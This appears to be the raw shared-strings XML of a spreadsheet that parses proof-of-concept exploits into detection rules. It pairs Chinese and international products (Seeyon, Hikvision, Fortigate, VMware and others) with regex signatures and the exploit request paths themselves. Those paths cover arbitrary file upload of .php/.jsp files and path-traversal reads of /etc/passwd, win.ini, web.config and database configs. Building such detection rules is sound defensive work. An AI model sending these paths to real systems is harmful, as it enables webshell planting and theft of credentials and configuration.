    <t>.*?(?:/seeyon/autoinstall\.do\.css/\.\.;/ajax\.do\?method=ajaxAction\&amp;managerName=formulaManager\&amp;requestCompress=gzip).*</t>
  </si>
  <si>
    <t>/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&amp;managerName=formulaManager&amp;requestCompress=gzip</t>
  </si>
  <si>
    <t>汉王</t>
  </si>
  <si>
    <t>汉王_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/manage/login/loginOn\.do/\.\.;/\.\.;/visitorMapConfig/uploadMapFile\.do).*</t>
  </si>
  <si>
    <t>/manage/login/loginOn.do/..;/..;/visitorMapConfig/uploadMapFile.do</t>
  </si>
  <si>
    <t>Prestashop</t>
  </si>
  <si>
    <t>Prestashop_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/modules/cartabandonmentpro/uploads/\{\{filename\}\}\.php\.png).*</t>
  </si>
  <si>
    <t>/modules/cartabandonmentpro/uploads/{{filename}}.php.png</t>
  </si>
  <si>
    <t>致远OA_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/seeyon/autoinstall\.do/\.\./\.\./seeyon/privilege/menu\.do|/seeyon/autoinstall\.do/\.\./\.\./seeyon/fileUpload\.do\?method=processUpload|/seeyon/main/menuIcon/\{\{filename\}\}).*</t>
  </si>
  <si>
    <t>/seeyon/autoinstall.do/../../seeyon/privilege/menu.do|/seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload|/seeyon/main/menuIcon/{{filename}}</t>
  </si>
  <si>
    <t>海康威视 Ivms</t>
  </si>
  <si>
    <t>海康威视 Ivms_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/eps/api/resourceOperations/upload\?token=\{\{to_upper\(md5\(concat\("\{\{RootURL\}\}","/eps/api/resourceOperations/uploadsecretKeyIbuilding"\)\)\)\}\}).*</t>
  </si>
  <si>
    <t>/eps/api/resourceOperations/upload?token={{to_upper(md5(concat("{{RootURL}}","/eps/api/resourceOperations/uploadsecretKeyIbuilding")))}}</t>
  </si>
  <si>
    <t>红帆_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/iOffice/prg/set/report/iorepsavexml\.aspx\?key=writefile\&amp;filename=\{\{filename\}\}\&amp;filepath=/upfiles/rep/pic/).*</t>
  </si>
  <si>
    <t>/iOffice/upfiles/rep/pic/{{filename}}|/iOffice/prg/set/report/iorepsavexml.aspx?key=writefile&amp;filename={{filename}}&amp;filepath=/upfiles/rep/pic/</t>
  </si>
  <si>
    <t>Magicflu</t>
  </si>
  <si>
    <t>Magicflu_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/magicflu/html/mail/mailupdate\.jsp\?messageid=/\.\./\.\./\.\./\{\{name\}\}\.txt\&amp;messagecontent=\{\{data\}\}</t>
  </si>
  <si>
    <t>/magicflu/html/mail/mailupdate.jsp?messageid=/../../../{{name}}.txt&amp;messagecontent={{data}}|/magicflu/{{name}}.txt</t>
  </si>
  <si>
    <t>米拓_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/admin/index\.php\?m=include\&amp;c=uploadify\&amp;a=doupfile\&amp;savepath=\{\{unix_time\(\)\}\}\.php%80\&amp;formname=file\&amp;is_rename=0|/admin/index\.php\?m=include\&amp;c=uploadify\&amp;a=doupfile\&amp;savepath=shell\.php%80\&amp;formname=file\&amp;is_rename=0).*</t>
  </si>
  <si>
    <t>/admin/index.php?m=include&amp;c=uploadify&amp;a=doupfile&amp;savepath={{unix_time()}}.php%80&amp;formname=file&amp;is_rename=0|/admin/index.php?m=include&amp;c=uploadify&amp;a=doupfile&amp;savepath=shell.php%80&amp;formname=file&amp;is_rename=0</t>
  </si>
  <si>
    <t>锐捷 NBR fileuplOAd</t>
  </si>
  <si>
    <t>锐捷 NBR fileuplOAd_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/ddi/server/fileupload\.php\?uploadDir=upload\&amp;name=\{\{filename\}\}\.php).*</t>
  </si>
  <si>
    <t>/ddi/server/fileupload.php?uploadDir=upload&amp;name={{filename}}.php</t>
  </si>
  <si>
    <t>.*?(?:/seeyon/wpsAssistServlet\?flag=save\&amp;realFileType=\.\./\.\./\.\./\.\./ApacheJetspeed/webapps/ROOT/\{\{filename\}\}\.jsp\&amp;fileId=2</t>
  </si>
  <si>
    <t>/seeyon/wpsAssistServlet?flag=save&amp;realFileType=../../../../ApacheJetspeed/webapps/ROOT/{{filename}}.jsp&amp;fileId=2|/{{filename}}.jsp</t>
  </si>
  <si>
    <t>通达OA_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/inc/package/work\.php\?id=\.\./\.\./\.\./\.\./\.\./myoa/attach/approve_center/2109/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E\.\{\{filename\}\}).*</t>
  </si>
  <si>
    <t>/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2109/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.{{filename}}</t>
  </si>
  <si>
    <t>.*?(?:/UploadFileData\?action=upload_file\&amp;filename=\.\./\{\{randstr_1\}\}\.jsp).*</t>
  </si>
  <si>
    <t>/UploadFileData?action=upload_file&amp;filename=../{{randstr_1}}.jsp</t>
  </si>
  <si>
    <t>.*?(?:/uapim/upload/grouptemplet\?groupid=\{\{v1\}\}\&amp;fileType=jsp).*</t>
  </si>
  <si>
    <t>/uapim/upload/grouptemplet?groupid={{v1}}&amp;fileType=jsp</t>
  </si>
  <si>
    <t>万户_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/extension/smartUpload\.jsp\?path=information\&amp;fileName=infoPicName\&amp;saveName=infoPicSaveName\&amp;tableName=infoPicTable\&amp;fileMaxSize=0\&amp;fileMaxNum=0\&amp;fileType=gif,jpg,bmp,jsp,png\&amp;fileMinWidth=0\&amp;fileMinHeight=0\&amp;fileMaxWidth=0\&amp;fileMaxHeight=0).*</t>
  </si>
  <si>
    <t>/defaultroot/extension/smartUpload.jsp?path=information&amp;fileName=infoPicName&amp;saveName=infoPicSaveName&amp;tableName=infoPicTable&amp;fileMaxSize=0&amp;fileMaxNum=0&amp;fileType=gif,jpg,bmp,jsp,png&amp;fileMinWidth=0&amp;fileMinHeight=0&amp;fileMaxWidth=0&amp;fileMaxHeight=0</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/upload/information/\{\{uploadfile\}\}|/defaultroot/extension/smartUpload\.jsp\?path=information\&amp;mode=add\&amp;fileName=infoPicName\&amp;saveName=infoPicSaveName\&amp;tableName=infoPicTable\&amp;fileMaxSize=0\&amp;fileMaxNum=0\&amp;fileType=gif,jpg,bmp,jsp,png\&amp;fileMinWidth=0\&amp;fileMinHeight=0\&amp;fileMaxWidth=0\&amp;fileMaxHeight=0).*</t>
  </si>
  <si>
    <t>/defaultroot/upload/information/{{uploadfile}}|/defaultroot/extension/smartUpload.jsp?path=information&amp;mode=add&amp;fileName=infoPicName&amp;saveName=infoPicSaveName&amp;tableName=infoPicTable&amp;fileMaxSize=0&amp;fileMaxNum=0&amp;fileType=gif,jpg,bmp,jsp,png&amp;fileMinWidth=0&amp;fileMinHeight=0&amp;fileMaxWidth=0&amp;fileMaxHeight=0</t>
  </si>
  <si>
    <t>大汉 JCMS_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/lm/sys/opr_uploadimg\.jsp\?action=upload\&amp;img=testvul\.jsp).*</t>
  </si>
  <si>
    <t>/lm/sys/opr_uploadimg.jsp?action=upload&amp;img=testvul.jsp</t>
  </si>
  <si>
    <t>泛微E-Office</t>
  </si>
  <si>
    <t>CNVD-2021-49104</t>
  </si>
  <si>
    <t>泛微E-Office_任意文件上传_CNVD-2021-49104</t>
  </si>
  <si>
    <t>.*?(?:/general/index/UploadFile\.php\?m=uploadPicture\&amp;uploadType=eoffice_logo\&amp;userId=</t>
  </si>
  <si>
    <t>/general/index/UploadFile.php?m=uploadPicture&amp;uploadType=eoffice_logo&amp;userId=|/images/logo/logo-eoffice.txt</t>
  </si>
  <si>
    <t>泛微OA_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/page/exportImport/fileTransfer/randomLowercase\(4\)\.jsp).*</t>
  </si>
  <si>
    <t>/page/exportImport/fileTransfer/randomLowercase(4).jsp</t>
  </si>
  <si>
    <t>万户 ezOFFICE</t>
  </si>
  <si>
    <t>万户 ezOFFICE_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/extension/smartUpload\.jsp\?path=information\&amp;mode=add\&amp;fileName=infoPicName\&amp;saveName=infoPicSaveName\&amp;tableName=infoPicTable\&amp;fileMaxSize=0\&amp;fileMaxNum=0\&amp;fileType=gif,jpg,bmp,jsp,png\&amp;fileMinWidth=0\&amp;fileMinHeight=0\&amp;fileMaxWidth=0\&amp;fileMaxHeight=0).*</t>
  </si>
  <si>
    <t>/defaultroot/extension/smartUpload.jsp?path=information&amp;mode=add&amp;fileName=infoPicName&amp;saveName=infoPicSaveName&amp;tableName=infoPicTable&amp;fileMaxSize=0&amp;fileMaxNum=0&amp;fileType=gif,jpg,bmp,jsp,png&amp;fileMinWidth=0&amp;fileMinHeight=0&amp;fileMaxWidth=0&amp;fileMaxHeight=0</t>
  </si>
  <si>
    <t>.*?(?:/defaultroot/wpsservlet\?option=saveNewFile\&amp;newdocId=cnvd\&amp;dir=\.\./platform/portal/layout/\&amp;fileType=\.txt).*</t>
  </si>
  <si>
    <t>/defaultroot/wpsservlet?option=saveNewFile&amp;newdocId=cnvd&amp;dir=../platform/portal/layout/&amp;fileType=.txt</t>
  </si>
  <si>
    <t>浙大恩特客户资源管理系统</t>
  </si>
  <si>
    <t>浙大恩特客户资源管理系统_任意文件上传</t>
  </si>
  <si>
    <t>.*?(?:/enterdoc/uploadfile/\{\{filename\}\}\.jsp).*</t>
  </si>
  <si>
    <t>/enterdoc/uploadfile/{{filename}}.jsp</t>
  </si>
  <si>
    <t>.*?(?:/seeyon/wpsAssistServlet\?flag=save\&amp;realFileType=\.\./\.\./\.\./\.\./ApacheJetspeed/webapps/ROOT/debugggg\.jsp\&amp;fileId=2).*</t>
  </si>
  <si>
    <t>/seeyon/wpsAssistServlet?flag=save&amp;realFileType=../../../../ApacheJetspeed/webapps/ROOT/debugggg.jsp&amp;fileId=2</t>
  </si>
  <si>
    <t>Resin_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/resin\-doc/resource/tutorial/jndi\-appconfig/test\?inputFile=\.\./\.\./\.\./\.\./\.\./index\.jsp).*</t>
  </si>
  <si>
    <t>/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp</t>
  </si>
  <si>
    <t>Apache_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/solr/debug/dump\?stream\.url=file:///etc/passwd\&amp;param=ContentStream).*</t>
  </si>
  <si>
    <t>/solr/debug/dump?stream.url=file:///etc/passwd&amp;param=ContentStream</t>
  </si>
  <si>
    <t>Dwsurvey</t>
  </si>
  <si>
    <t>Dwsurvey_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/diaowen/toHtml\?filePath=/\&amp;fileName=1\.txt\&amp;url=/WEB\-INF/web\.xml).*</t>
  </si>
  <si>
    <t>/diaowen/toHtml?filePath=/&amp;fileName=1.txt&amp;url=/WEB-INF/web.xml</t>
  </si>
  <si>
    <t>Green</t>
  </si>
  <si>
    <t>Green_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/webconf/GetFile/index\?path=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>海康威视</t>
  </si>
  <si>
    <t>海康威视_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/center/api/task/\.\.;/orgManage/v1/orgs/download\?fileName=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>local_file_inclusion_POC解析结果.xlsx</t>
  </si>
  <si>
    <t>宏景_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/w_selfservice/oauthservlet/%2e\./\.%2e/DownLoadCourseware\?url=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT).*</t>
  </si>
  <si>
    <t>/w_selfservice/oauthservlet/%2e./.%2e/DownLoadCourseware?url=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT</t>
  </si>
  <si>
    <t>Hjtcloud</t>
  </si>
  <si>
    <t>Hjtcloud_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/him/api/rest/V1\.0/system/log/list\?filePath=\.\./).*</t>
  </si>
  <si>
    <t>/him/api/rest/V1.0/system/log/list?filePath=../</t>
  </si>
  <si>
    <t>Huatian</t>
  </si>
  <si>
    <t>Huatian_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/OAapp/jsp/downloadWpsFile\.jsp\?fileName=\.\./\.\./\.\./\.\./\.\./\.\./htoa/Tomcat/webapps/ROOT/WEB\-INF/web\.xml).*</t>
  </si>
  <si>
    <t>/OAapp/jsp/downloadWpsFile.jsp?fileName=../../../../../../htoa/Tomcat/webapps/ROOT/WEB-INF/web.xml</t>
  </si>
  <si>
    <t>锐捷_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/selfservice/selfservice/module/scgroup/web/login_judge\.jsf\?view=\./WEB\-INF/web\.xml%3F).*</t>
  </si>
  <si>
    <t>/selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F</t>
  </si>
  <si>
    <t>致远OA_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/a/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/\.%252e/c:/windows/win\.ini).*</t>
  </si>
  <si>
    <t>/a/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/c:/windows/win.ini</t>
  </si>
  <si>
    <t>Semi</t>
  </si>
  <si>
    <t>Semi_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/__nuxt_vite_node__/module/C:/Windows/System32/calc\.exe|/__nuxt_vite_node__/module//bin/passwd).*</t>
  </si>
  <si>
    <t>/__nuxt_vite_node__/module/C:/Windows/System32/calc.exe|/__nuxt_vite_node__/module//bin/passwd</t>
  </si>
  <si>
    <t>Shunjing</t>
  </si>
  <si>
    <t>Shunjing_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/api/Download/GetFile\?FileName=/\.\./web\.config\&amp;Title=).*</t>
  </si>
  <si>
    <t>/api/Download/GetFile?FileName=/../web.config&amp;Title=</t>
  </si>
  <si>
    <t>Tianwen</t>
  </si>
  <si>
    <t>Tianwen_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/HM/M_Main/InformationManage/ContractDownLoad\.aspx\?ContractFile=\.\./web\.config|/HM/M_main/InformationManage/VacantDiscountDownLoad\.aspx\?VacantDiscountFile=\.\./web\.config|/HM/M_main/InformationManage/OwnerVacantDownLoad\.aspx\?OwnerVacantFile=\.\./web\.config|/HM/M_Main/InformationManage/ParkingFeelFileDownLoad\.aspx\?ParkingFile=\.\./web\.config|/HM/M_Main/InformationManage/PlanDownLoad\.aspx\?PlanFile=\.\./web\.config).*</t>
  </si>
  <si>
    <t>/HM/M_Main/InformationManage/ContractDownLoad.aspx?ContractFile=../web.config|/HM/M_main/InformationManage/VacantDiscountDownLoad.aspx?VacantDiscountFile=../web.config|/HM/M_main/InformationManage/OwnerVacantDownLoad.aspx?OwnerVacantFile=../web.config|/HM/M_Main/InformationManage/ParkingFeelFileDownLoad.aspx?ParkingFile=../web.config|/HM/M_Main/InformationManage/PlanDownLoad.aspx?PlanFile=../web.config</t>
  </si>
  <si>
    <t>Venusense</t>
  </si>
  <si>
    <t>Venusense_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/vpn/user/download/client\?ostype=\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/vpn/user/download/client?ostype=../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Vmware_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/eam/vib\?id=\{\{path\}\}\\vcdb\.properties|C:\\Documents\+and\+Settings\\All\+Users\\Application\+Data\\VMware\\VMware\+VirtualCenter|C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware\-vpx|C:\\ProgramData\\VMware\\VMware\+VirtualCenter|/eam/vib\?id=C:\\\\ProgramData\\\\VMware\\\\vCenterServer\\\\cfg\\\\vmware\-vpx\\vcdb\.properties|/eam/vib\?id=C:\\\\Documents\+and\+Settings\\\\All\+Users\\\\Application\+Data\\\\VMware\\\\VMware\+VirtualCenter\\vcdb\.properties|/eam/vib\?id=C:\\\\ProgramData\\\\VMware\\\\VMware\+VirtualCenter\\vcdb\.properties).*</t>
  </si>
  <si>
    <t>/eam/vib?id={{path}}\vcdb.properties|C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter|C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx|C:\ProgramData\VMware\VMware+VirtualCenter|/eam/vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\vcdb.properties|/eam/vib?id=C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter\vcdb.properties|/eam/vib?id=C:\\ProgramData\\VMware\\VMware+VirtualCenter\vcdb.properties</t>
  </si>
  <si>
    <t>.*?(?:C:\\ProgramData\\VMware\\VMware\+VirtualCenter|C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware\-vpx|/eam/vib\?id=\{\{path\}\}\\vcdb\.properties|C:\\Documents\+and\+Settings\\All\+Users\\Application\+Data\\VMware\\VMware\+VirtualCenter|/eam/vib\?id=C:\\\\ProgramData\\\\VMware\\\\VMware\+VirtualCenter\\vcdb\.properties|/eam/vib\?id=C:\\\\Documents\+and\+Settings\\\\All\+Users\\\\Application\+Data\\\\VMware\\\\VMware\+VirtualCenter\\vcdb\.properties|/eam/vib\?id=C:\\\\ProgramData\\\\VMware\\\\vCenterServer\\\\cfg\\\\vmware\-vpx\\vcdb\.properties).*</t>
  </si>
  <si>
    <t>C:\ProgramData\VMware\VMware+VirtualCenter|C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx|/eam/vib?id={{path}}\vcdb.properties|C:\Documents+and+Settings\All+Users\Application+Data\VMware\VMware+VirtualCenter|/eam/vib?id=C:\\ProgramData\\VMware\\VMware+VirtualCenter\vcdb.properties|/eam/vib?id=C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter\vcdb.properties|/eam/vib?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx\vcdb.properties</t>
  </si>
  <si>
    <t>.*?(?:/eam/vib\?id=/etc/passwd|/eam/vib\?id=C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware\-vpx\\vcdb\.properties).*</t>
  </si>
  <si>
    <t>/eam/vib?id=/etc/passwd|/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties</t>
  </si>
  <si>
    <t>用友_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/pub/help\.php\?key=YTozOntpOjA7czoyNDoiLy4uLy4uLy4uL2FwYWNoZS9waHAuaW5pIjtpOjE7czoxOiIxIjtpOjI7czoxOiIyIjt9).*</t>
  </si>
  <si>
    <t>/pub/help.php?key=YTozOntpOjA7czoyNDoiLy4uLy4uLy4uL2FwYWNoZS9waHAuaW5pIjtpOjE7czoxOiIxIjtpOjI7czoxOiIyIjt9</t>
  </si>
  <si>
    <t>.*?(?:/portal/pt/downCourseWare/download\?fileName=\.\./webapps/nc_web/WEB\-INF/web\.xml\&amp;pageId=login).*</t>
  </si>
  <si>
    <t>/portal/pt/downCourseWare/download?fileName=../webapps/nc_web/WEB-INF/web.xml&amp;pageId=login</t>
  </si>
  <si>
    <t>Array Vpn</t>
  </si>
  <si>
    <t>Array Vpn_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/prx/000/http/localhost/client_sec/%00\.\./\.\./\.\./addfolder).*</t>
  </si>
  <si>
    <t>/prx/000/http/localhost/client_sec/%00../../../addfolder</t>
  </si>
  <si>
    <t>Cisco系统</t>
  </si>
  <si>
    <t>Cisco系统_任意文件读取_CVE-2020-3452</t>
  </si>
  <si>
    <t>.*?(?:/\+CSCOT\+/oem\-customization\?app=AnyConnect\&amp;type=oem\&amp;platform=\.\.\&amp;resource\-type=\.\.\&amp;name=%2bCSCOE%2b/portal_inc\.lua).*</t>
  </si>
  <si>
    <t>/+CSCOT+/oem-customization?app=AnyConnect&amp;type=oem&amp;platform=..&amp;resource-type=..&amp;name=%2bCSCOE%2b/portal_inc.lua</t>
  </si>
  <si>
    <t>Cpas Management System</t>
  </si>
  <si>
    <t>Cpas Management System_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/cpasm4/plugInManController/downPlugs\?fileId=\.\./\.\./\.\./\.\./etc/passwd\&amp;fileName).*</t>
  </si>
  <si>
    <t>/cpasm4/plugInManController/downPlugs?fileId=../../../../etc/passwd&amp;fileName</t>
  </si>
  <si>
    <t>Crocus System Service</t>
  </si>
  <si>
    <t>Crocus System Service_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/Service\.do\?Action=Download\&amp;Path=C:/windows/win\.ini).*</t>
  </si>
  <si>
    <t>Easyimage Down</t>
  </si>
  <si>
    <t>Easyimage Down_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/application/down\.php\?dw=config/config\.php).*</t>
  </si>
  <si>
    <t>/application/down.php?dw=config/config.php</t>
  </si>
  <si>
    <t>Ewebs Casmain</t>
  </si>
  <si>
    <t>Ewebs Casmain_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/casmain\.xgi).*</t>
  </si>
  <si>
    <t>/casmain.xgi</t>
  </si>
  <si>
    <t>Fortigate系统</t>
  </si>
  <si>
    <t>CVE-2018-13379</t>
  </si>
  <si>
    <t>Fortigate系统_任意文件读取_CVE-2018-13379</t>
  </si>
  <si>
    <t>.*?(?:/remote/fgt_lang\?lang=/\.\./\.\./\.\./\.\.//////////dev/cmdb/sslvpn_websession).*</t>
  </si>
  <si>
    <t>/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession</t>
  </si>
  <si>
    <t>.*?(?:/api/model_report/file/download\?index=/\&amp;ext=/etc/passwd).*</t>
  </si>
  <si>
    <t>.*?(?:/templates/attestation/\.\./\.\./servlet/DisplayExcelCustomReport).*</t>
  </si>
  <si>
    <t>/templates/attestation/../../servlet/DisplayExcelCustomReport</t>
  </si>
  <si>
    <t>红帆 OA Ioexport</t>
  </si>
  <si>
    <t>红帆 OA Ioexport_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/ioffice/prg/set/iocom/ioFileExport\.aspx\?url=/ioffice/web\.config\&amp;filename=\{\{filename\}\}\.txt\&amp;ContentType=application/octet\-stream).*</t>
  </si>
  <si>
    <t>Idoc View</t>
  </si>
  <si>
    <t>Idoc View_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/doc/upload\?token=testtoken\&amp;url=file:///C:/windows/win\.ini\&amp;name=\{\{file\}\}\.txt).*</t>
  </si>
  <si>
    <t>Jellyfin系统</t>
  </si>
  <si>
    <t>Jellyfin系统_任意文件读取_CVE-2021-21402</t>
  </si>
  <si>
    <t>.*?(?:/Audio/1/hls/\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5C\.\.%5CWindows%5Cwin\.ini/stream\.mp3/).*</t>
  </si>
  <si>
    <t>/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/</t>
  </si>
  <si>
    <t>Jolokia</t>
  </si>
  <si>
    <t>Jolokia_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/actuator/jolokia/exec/com\.sun\.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd|/jolokia/exec/com\.sun\.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd).*</t>
  </si>
  <si>
    <t>/actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd|/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd</t>
  </si>
  <si>
    <t>Joomla_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/plugins/content/s5_media_player/helper\.php\?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=).*</t>
  </si>
  <si>
    <t>/plugins/content/s5_media_player/helper.php?fileurl=Li4vLi4vLi4vY29uZmlndXJhdGlvbi5waHA=</t>
  </si>
  <si>
    <t>.*?(?:/index\.php\?option=com_joomanager\&amp;controller=details\&amp;task=download\&amp;path=configuration\.php).*</t>
  </si>
  <si>
    <t>/index.php?option=com_joomanager&amp;controller=details&amp;task=download&amp;path=configuration.php</t>
  </si>
  <si>
    <t>Leadsec Vpn</t>
  </si>
  <si>
    <t>Leadsec Vpn_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/vpn/user/download/client\?ostype=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/vpn/user/download/client?ostype=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>Livebos Showimage</t>
  </si>
  <si>
    <t>Livebos Showimage_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/feed/ShowImage\.do;\.js\.jsp\?type=\&amp;imgName=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>/feed/ShowImage.do;.js.jsp?type=&amp;imgName=../../../../../../../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>mallbuilder商城_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/plugin\.php\?id=hux_wx:hux_wx\&amp;uid=1\&amp;mod=\.\./\.\./\.\./\.\.\&amp;ac=robots\.txt%00).*</t>
  </si>
  <si>
    <t>/plugin.php?id=hux_wx:hux_wx&amp;uid=1&amp;mod=../../../..&amp;ac=robots.txt%00</t>
  </si>
  <si>
    <t>米拓_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/member/index\.php\?a=doshow\&amp;m=include\&amp;c=old_thumb\&amp;dir=http/\./\.\.\./\.\.\./\.//\./\.\.\./\.\.\./\.//config/config_db\.php).*</t>
  </si>
  <si>
    <t>/member/index.php?a=doshow&amp;m=include&amp;c=old_thumb&amp;dir=http/./.../..././/./.../..././/config/config_db.php</t>
  </si>
  <si>
    <t>.*?(?:/include/thumb\.php\?dir=php://filter/read=http/resource=c:/windows/system32/drivers/etc/hosts|/include/thumb\.php\?dir=php://filter/read=http/resource=/etc/passwd).*</t>
  </si>
  <si>
    <t>/include/thumb.php?dir=php://filter/read=http/resource=c:/windows/system32/drivers/etc/hosts|/include/thumb.php?dir=php://filter/read=http/resource=/etc/passwd</t>
  </si>
  <si>
    <t>.*?(?:/include/thumb\.php\?x=1\&amp;y=/\.\./\.\./\.\./config\&amp;dir=config_db\.php).*</t>
  </si>
  <si>
    <t>/include/thumb.php?x=1&amp;y=/../../../config&amp;dir=config_db.php</t>
  </si>
  <si>
    <t>.*?(?:/include/thumb\.php\?dir=http/\.\.\.\.\.///\.\.\.\.\.///config/config_db\.php).*</t>
  </si>
  <si>
    <t>/include/thumb.php?dir=http/.....///.....///config/config_db.php</t>
  </si>
  <si>
    <t>Moticdsm</t>
  </si>
  <si>
    <t>Moticdsm_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/UploadService/Page/style\?f=c:\\windows\\win\.ini).*</t>
  </si>
  <si>
    <t>/UploadService/Page/style?f=c:\windows\win.ini|/UploadService/Page/</t>
  </si>
  <si>
    <t>MyuCMS</t>
  </si>
  <si>
    <t>MyuCMS_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/index\.php/bbs/index/download\?url=/etc/passwd\&amp;name=1\.txt\&amp;local=1).*</t>
  </si>
  <si>
    <t>/index.php/bbs/index/download?url=/etc/passwd&amp;name=1.txt&amp;local=1</t>
  </si>
  <si>
    <t>Nsfocus_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/user/requireLogin|/webconf/GetFile/index\?path=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./etc/passwd).*</t>
  </si>
  <si>
    <t>‌泛微 E-Cology_任意文件读取</t>
  </si>
  <si>
    <t>.*?(?:/iweboffice/officeserver\.php\?OPTION=LOADFILE\&amp;FILENAME=\.\./mysql_config\.ini</t>
  </si>
  <si>
    <t>/iweboffice/officeserver.php?OPTION=LOADFILE&amp;FILENAME=../mysql_config.ini|/weaver/weaver.file.SignatureDownLoad?markId=0%20union%20select%20%27../ecology/WEB-INF/prop/weaver.properties%27|/portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp</t>
  </si>
  <si>
